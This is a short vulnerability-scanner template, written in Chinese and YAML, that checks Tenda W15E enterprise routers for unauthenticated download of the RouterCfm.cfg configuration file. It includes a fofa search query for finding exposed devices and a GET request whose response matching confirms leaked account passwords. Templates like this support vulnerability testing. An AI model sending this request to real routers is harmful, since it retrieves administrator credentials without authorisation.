id: tenda-w15e-routercfm-cfg-config-leak

info:
  name: Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
  author: zan8in
  severity: high
  verified: false
  description: |
    Tenda 企业级路由器 RouterCfm.cfg 配置文件可在未授权的情况下被读取，导致账号密码等敏感信息泄漏
    fofa: title=="Tenda | Login" && country="CN"
  tags: tenda,os,router,cfg,config,leak
  created: 2025/10/27

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/DownloadCfg/RouterCfm.cfg
    expression: response.status == 200 && response.body.bcontains(b'sys.userpass=') && response.body.bcontains(b'sys.userpass.decode.pwd=')
expression: r0()
